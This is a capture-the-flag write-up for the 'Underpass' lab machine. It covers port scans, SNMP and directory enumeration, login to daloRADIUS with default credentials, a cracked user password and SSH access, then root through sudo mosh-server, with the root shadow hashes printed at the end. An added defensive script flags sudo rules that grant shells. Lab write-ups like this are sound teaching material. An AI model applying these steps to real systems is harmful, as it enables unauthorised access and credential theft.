Basic information

Port scan

Ports 22 and 80:

$ nmap -sC -sV -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:35 CST
Nmap scan report for 10.10.11.48
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.88 seconds

This machine also needs a UDP scan:

$ sudo nmap -sU -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:44 CST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.080s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct

Nmap done: 1 IP address (1 host up) scanned in 1043.46 seconds

80

Browsing to it directly shows the Apache default page:

SNMP

SNMP reveals underpass.htb, along with information such as a daloradius server:

daloradius

Add a hosts entry based on that information. Requesting daloradius directly returns 403:

Routine directory scan:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://underpass.htb/daloradius/

/.gitignore (Status: 200) [Size: 221]
/ChangeLog (Status: 200) [Size: 24703]
/LICENSE (Status: 200) [Size: 18011]
/app (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/contrib (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/doc (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/library (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/setup (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]

Requesting these paths directly also returns 403, but they are clearly the project's default paths:

  • lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
    https://github.com/lirantal/daloradius

Following the GitHub repo, go straight to the login page:

Log in to the operators interface with the default credentials:

administrator:radius

Management -> List Users shows the usernames and password hashes; cracking the hash gives the password:

svcMosh 412DD4759978ACFCC81DEAB01B382403

underwaterfriends

user flag

Log in over SSH with the recovered credentials:

ssh svcMosh@10.10.11.48
underwaterfriends

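Privilege escalation information

The user can run mosh-server with sudo. A quick search shows that it is a remote terminal program, so a server started through sudo is effectively a root shell; connecting with the matching client is all that is needed.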
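
The risk described above, seen from the defender's side: an added example (not part of the original writeup) that parses `sudo -l` output and flags rules that let a user run a shell-granting program as root. The sample listing, the `/usr/bin/mosh-server` path and the `SHELL_GRANTING` set are assumptions constructed for illustration.

```python
import os
import re

# Assumption: basenames of programs that give the caller a shell or run
# arbitrary commands. Illustrative only, not an exhaustive list.
SHELL_GRANTING = {"mosh-server", "bash", "sh", "su", "env", "find", "vim", "python3"}

# Constructed sample of `sudo -l` output; the binary path is an assumption.
SAMPLE = """\
Matching Defaults entries for svcMosh on underpass:
    env_reset, mail_badpass

User svcMosh may run the following commands on underpass:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl status apache2
"""

# One rule line: "(runas[:group]) [TAG: ...] command[, command ...]"
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_listing(text):
    """Return the rules that let the user run a shell-granting program as root."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines, headers and blanks are not rules
        users = m.group("runas").split(":")[0].split(",")
        as_root = any(u.strip() in ("ALL", "root") for u in users)
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Simplification: commas escaped inside command arguments are not handled
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            if cmd.startswith("!"):
                continue  # negated entries deny a command, they do not grant it
            binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            if as_root and (binary == "ALL" or binary in SHELL_GRANTING):
                findings.append({"command": cmd, "binary": binary, "nopasswd": nopasswd})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        auth = "without a password" if f["nopasswd"] else "after authentication"
        print(f"root-equivalent: {f['command']} ({auth})")
```
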

Privilege escalation & root flag

Run mosh-server, then connect with mosh-client:

svcMosh@underpass:~$ MOSH_KEY=zTvNRaskmhEqBM5mElUeDA mosh-client 127.0.0.1 60001

shadow

root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
svcMosh:$y$j9T$cK5jfCW.c6g5yvOzPF5iF1$E0geEsKPdNSCLj2wVbvftMGkbs.uJL7B0ADA41Q8Y08:20067:0:99999:7:::

References

  • lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
    https://github.com/lirantal/daloradius
  • mobile-shell/mosh: Mobile Shell
    https://github.com/mobile-shell/mosh